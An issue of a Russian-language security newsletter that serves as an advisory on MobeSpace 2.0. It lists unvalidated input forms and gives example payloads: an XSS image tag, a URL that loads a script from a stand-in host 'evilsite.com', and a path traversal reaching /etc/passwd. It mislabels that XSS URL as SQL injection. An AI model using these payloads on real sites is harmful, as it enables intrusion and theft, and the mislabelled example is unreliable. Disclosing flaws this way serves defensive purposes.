Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MobeSpace.


Компьютер для продвинутых пользователей
В этом выпуске:
MobeSpace
ПО: MobeSpace
Версия: 2.0
Сайт: http://mobescripts.com/

Уязвимость:
Формы ввода:
- Profile
- Comments
- Uploading a file to your locker
- Posting in your blog
- Creating a caption for your pic
- Sending PM's
Все эти формы не проверяются до генерации ответов.
Так же возможно провести SQL-инъекцию. Это возможно из-за ошибки SQL синтаксиса.
Использование:
В форму вводу введите JavaScript код, например <IMG SRC=javascript:alert('XSS')>.
SQL-Инъекция: http://mobespace.com/index.php?browse=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]&q=&update=Search&page=search&search=Search+DataBase
RSS раскрытие директорий: http://www.example.com/index.php?page=rss&uid=/../../../../etc/passwd/
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное